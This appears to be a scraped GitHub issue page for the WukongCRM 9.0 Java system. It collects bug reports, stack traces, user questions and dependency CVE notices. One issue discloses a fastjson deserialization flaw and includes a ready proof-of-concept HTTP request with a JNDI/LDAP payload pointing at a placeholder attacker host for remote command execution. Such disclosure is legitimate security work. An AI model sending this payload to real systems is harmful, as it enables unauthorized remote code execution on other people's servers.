wukongopensource / wukongcrm-9.0-java Goto Github PK
View Code? Open in Web Editor NEW悟空CRM-基于jfinal+vue+ElementUI的前后端分离CRM系统
Home Page: http://www.5kcrm.com
License: Other
悟空CRM-基于jfinal+vue+ElementUI的前后端分离CRM系统
Home Page: http://www.5kcrm.com
License: Other
研究了一个多星期,悟空crm适合拿来直接用,不适合深度定制,代码和sql可读性太差了,很多版本太老旧,官方也不继续维护,跟JeecgBoot和ruoyi-vue-pro没法比。软件没有了维护就意味着生命周期终止。
https://github.com/jeecgboot/jeecg-boot
https://github.com/YunaiV/ruoyi-vue-pro
首页工作台的数据隔离有问题,添加了日程后,后台数据设为只有本人能看,但同部门的人都能看到,不同部门的人看不到,应该只有自已可看,日程菜单进去后是对的,但工作台会有相同部门其他人的记录
2019-07-22 13:21:33,245 [ERROR][XNIO-1 task-111][ErpInterceptor.java:49] 响应错误
com.jfinal.plugin.activerecord.ActiveRecordException: java.lang.IllegalArgumentException: The element in list must be Model or Record.
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1050)
at com.jfinal.plugin.activerecord.Db.batch(Db.java:617)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService.lambda$deleteByIds$0(CrmLeadsService.java:155)
at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:770)
at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:807)
at com.jfinal.plugin.activerecord.Db.tx(Db.java:545)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService.deleteByIds(CrmLeadsService.java:153)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.CGLIB$deleteByIds$7(<generated>)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c$$FastClassByCGLIB$$58167888.invoke(<generated>)
at net.sf.cglib.proxy.MethodProxy.invokeSuper(MethodProxy.java:228)
at com.jfinal.aop.Invocation.invoke(Invocation.java:81)
at com.jfinal.aop.Callback.intercept(Callback.java:68)
at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.deleteByIds(<generated>)
at com.kakarote.crm9.erp.crm.controller.CrmLeadsController.deleteByIds(CrmLeadsController.java:100)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.jfinal.aop.Invocation.invoke(Invocation.java:74)
at com.kakarote.crm9.erp.crm.common.CrmInterceptor.intercept(CrmInterceptor.java:84)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.kakarote.crm9.common.interceptor.AuthInterceptor.intercept(AuthInterceptor.java:39)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.kakarote.crm9.common.interceptor.ErpInterceptor.intercept(ErpInterceptor.java:46)
at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
at com.jfinal.core.ActionHandler.handle(ActionHandler.java:89)
at com.jfinal.plugin.druid.DruidStatViewHandler.handle(DruidStatViewHandler.java:81)
at com.jfinal.core.JFinalFilter.doFilter(JFinalFilter.java:89)
at io.undertow.servlet.core.ManagedFilter.doFilter(ManagedFilter.java:61)
at io.undertow.servlet.handlers.FilterHandler$FilterChainImpl.doFilter(FilterHandler.java:131)
at io.undertow.servlet.handlers.FilterHandler.handleRequest(FilterHandler.java:84)
at io.undertow.servlet.handlers.security.ServletSecurityRoleHandler.handleRequest(ServletSecurityRoleHandler.java:62)
at io.undertow.servlet.handlers.ServletChain$1.handleRequest(ServletChain.java:68)
at io.undertow.servlet.handlers.ServletDispatchingHandler.handleRequest(ServletDispatchingHandler.java:36)
at io.undertow.servlet.handlers.security.SSLInformationAssociationHandler.handleRequest(SSLInformationAssociationHandler.java:132)
at io.undertow.servlet.handlers.security.ServletAuthenticationCallHandler.handleRequest(ServletAuthenticationCallHandler.java:57)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.security.handlers.AbstractConfidentialityHandler.handleRequest(AbstractConfidentialityHandler.java:46)
at io.undertow.servlet.handlers.security.ServletConfidentialityConstraintHandler.handleRequest(ServletConfidentialityConstraintHandler.java:64)
at io.undertow.security.handlers.AuthenticationMechanismsHandler.handleRequest(AuthenticationMechanismsHandler.java:60)
at io.undertow.servlet.handlers.security.CachedAuthenticatedSessionHandler.handleRequest(CachedAuthenticatedSessionHandler.java:77)
at io.undertow.security.handlers.AbstractSecurityContextAssociationHandler.handleRequest(AbstractSecurityContextAssociationHandler.java:43)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest(ServletInitialHandler.java:292)
at io.undertow.servlet.handlers.ServletInitialHandler.access$100(ServletInitialHandler.java:81)
at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:138)
at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:135)
at io.undertow.servlet.core.ServletRequestContextThreadSetupAction$1.call(ServletRequestContextThreadSetupAction.java:48)
at io.undertow.servlet.core.ContextClassLoaderSetupAction$1.call(ContextClassLoaderSetupAction.java:43)
at io.undertow.servlet.handlers.ServletInitialHandler.dispatchRequest(ServletInitialHandler.java:272)
at io.undertow.servlet.handlers.ServletInitialHandler.access$000(ServletInitialHandler.java:81)
at io.undertow.servlet.handlers.ServletInitialHandler$1.handleRequest(ServletInitialHandler.java:104)
at io.undertow.server.Connectors.executeRootHandler(Connectors.java:364)
at io.undertow.server.HttpServerExchange$1.run(HttpServerExchange.java:830)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.IllegalArgumentException: The element in list must be Model or Record.
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:973)
at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1048)
... 57 more
批量客户放入公海报错
导入5000条数据查询超时
php版没这个问题
默认admin的密码多少呀?
移动端的源代码有吗?
Sent from PPHub
前端代码从哪下?
对于涉及到的法律问题不太清楚,麻烦解答
In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.
An insecure version of the fastjson component was used
First we found a vulnerability trigger :
http://localhost:8080/CrmCustomer/queryPageList
The construction method of BasePageRequest is called for processing. In the process of processing, the parseObject() method of fastjson is first called to parse the json string into a java bean. Due to the deserialization vulnerability of this version of fastjson, Attackers just visit: / CrmCustomer/queryPageList, and enter the malicious json string, can trigger a loophole
There are many attack modes in version 1.2.54, and only one of them is shown below:
This attack requires the xbean jar package to be introduced and AutoType to be enabled
Start the attack
POC :
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"
高级删选 下拉列表无值
版本 V9.2.3.191220
后台设置 客户管理角色 数据权限为本人 但是商业智能 模版所有数据都是对应部门的所有人的统计分析
如果要自己改 只需要改前端吗?
Caused by: com.mysql.jdbc.MysqlDataTruncation: Data truncation: BIGINT UNSIGNED value is out of range in '((to_days(`crm9`.`a`.`update_time`) + cast((select `crm9`.`72crm_admin_config`.`value` from `crm9`.`72crm_admin_config` where (`crm9`.`72crm_admin_config`.`name` = 'customerPoolSettingFollowupDays')) as unsigned)) - to_days(now()))'
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3971)
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:873)
at com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:1996)
at com.mysql.jdbc.MysqlIO.readSingleRowSet(MysqlIO.java:3410)
at com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:470)
at com.mysql.jdbc.MysqlIO.readResultsForQueryOrUpdate(MysqlIO.java:3112)
at com.mysql.jdbc.MysqlIO.readAllResults(MysqlIO.java:2341)
at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2736)
at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2487)
at com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1858)
at com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:1966)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2714)
at com.alibaba.druid.wall.WallFilter.preparedStatement_executeQuery(WallFilter.java:622)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
at com.alibaba.druid.filter.FilterEventAdapter.preparedStatement_executeQuery(FilterEventAdapter.java:465)
at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
at com.alibaba.druid.proxy.jdbc.PreparedStatementProxyImpl.executeQuery(PreparedStatementProxyImpl.java:145)
at com.alibaba.druid.pool.DruidPooledPreparedStatement.executeQuery(DruidPooledPreparedStatement.java:227)
at com.jfinal.plugin.activerecord.DbPro.find(DbPro.java:314)
at com.jfinal.plugin.activerecord.DbPro.doPaginateByFullSql(DbPro.java:578)
at com.jfinal.plugin.activerecord.DbPro.doPaginate(DbPro.java:535)
前端代码从哪下?
Hi, In 72crm-9.0-JAVA,there is a dependency org.apache.poi:poi-ooxml:3.17 that calls the risk method.
The scope of this CVE affected version is [,4.1.0)
After further analysis, in this project, the main Api called is <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
Risk method repair link : GitHub
CVE Bug Invocation Path--
Path Length : 4
org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
at <org.apache.poi.xssf.streaming.SXSSFCell: org.apache.poi.ss.usermodel.RichTextString getRichStringCellValue()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[453]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String toString()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[768]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <com.kakarote.crm9.erp.crm.service.CrmLeadsService: com.kakarote.crm9.utils.R uploadExcel(com.jfinal.upload.UploadFile,java.lang.Integer,java.lang.Integer)> (com.kakarote.crm9.erp.crm.service.CrmLeadsService.java:[393]) in /detect/unzip/72crm-9.0-JAVA-9.0.1_20191202/target/classes
Dependency tree--
[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.jfinal:jfinal-undertow:jar:1.9:compile
[INFO] | +- io.undertow:undertow-core:jar:2.0.25.Final:compile
[INFO] | | +- org.jboss.logging:jboss-logging:jar:3.4.0.Final:compile
[INFO] | | +- org.jboss.xnio:xnio-api:jar:3.3.8.Final:compile
[INFO] | | \- org.jboss.xnio:xnio-nio:jar:3.3.8.Final:runtime
[INFO] | +- io.undertow:undertow-servlet:jar:2.0.25.Final:compile
[INFO] | \- javax.servlet:javax.servlet-api:jar:4.0.1:compile
[INFO] +- com.jfinal:jfinal:jar:3.8:compile
[INFO] +- cglib:cglib-nodep:jar:3.2.5:compile
[INFO] +- com.jfinal:cos:jar:2019.8:compile
[INFO] +- it.sauronsoftware.cron4j:cron4j:jar:2.2.5:compile
[INFO] +- redis.clients:jedis:jar:2.9.0:compile
[INFO] | \- org.apache.commons:commons-pool2:jar:2.4.2:compile
[INFO] +- de.ruedigermoeller:fst:jar:2.50:compile
[INFO] | +- com.fasterxml.jackson.core:jackson-core:jar:2.8.8:compile
[INFO] | +- org.javassist:javassist:jar:3.21.0-GA:compile
[INFO] | +- org.objenesis:objenesis:jar:2.5.1:compile
[INFO] | \- com.cedarsoftware:java-util:jar:1.9.0:compile
[INFO] | +- commons-logging:commons-logging:jar:1.1.1:compile
[INFO] | \- com.cedarsoftware:json-io:jar:2.5.1:compile
[INFO] +- org.slf4j:slf4j-nop:jar:1.7.25:compile
[INFO] | \- org.slf4j:slf4j-api:jar:1.7.25:compile
[INFO] +- log4j:log4j:jar:1.2.16:compile
[INFO] +- mysql:mysql-connector-java:jar:5.1.44:compile
[INFO] +- com.alibaba:druid:jar:1.0.29:compile
[INFO] | +- com.alibaba:jconsole:jar:1.8.0:system
[INFO] | \- com.alibaba:tools:jar:1.8.0:system
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- cn.hutool:hutool-all:jar:4.4.0:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] | +- org.apache.poi:poi:jar:3.17:compile
[INFO] | | +- commons-codec:commons-codec:jar:1.10:compile
[INFO] | | \- org.apache.commons:commons-collections4:jar:4.1:compile
[INFO] | +- org.apache.poi:poi-ooxml-schemas:jar:3.17:compile
[INFO] | | \- org.apache.xmlbeans:xmlbeans:jar:2.6.0:compile
[INFO] | | \- stax:stax-api:jar:1.0.1:compile
[INFO] | \- com.github.virtuald:curvesapi:jar:1.04:compile
[INFO] +- com.aliyun:aliyun-java-sdk-core:jar:4.0.6:compile
[INFO] | +- com.google.code.gson:gson:jar:2.8.2:compile
[INFO] | +- org.apache.httpcomponents:httpclient:jar:4.5.3:compile
[INFO] | | \- org.apache.httpcomponents:httpcore:jar:4.4.6:compile
[INFO] | +- javax.xml.bind:jaxb-api:jar:2.1:compile
[INFO] | | \- javax.xml.stream:stax-api:jar:1.0-2:compile
[INFO] | +- com.sun.xml.bind:jaxb-core:jar:2.1.14:compile
[INFO] | +- com.sun.xml.bind:jaxb-impl:jar:2.1:compile
[INFO] | \- javax.activation:activation:jar:1.1.1:compile
[INFO] +- com.aliyun:aliyun-java-sdk-dysmsapi:jar:1.1.0:compile
[INFO] \- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile
Suggested solutions:
Update dependency version
Thank you very much.
http://10.195.182.29:8080/crm/index.html#/login?redirect=%2Fworkbench%2Findex
登录页面,输入用户名和密码后点登录,提示 “网络请求失败,请稍候再试”
http://10.195.182.29:8080/api/login
请求方法:POST
远程地址:10.195.182.29:8080
状态码:404
版本:HTTP/1.1
是我哪里没有配置对???????????????
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.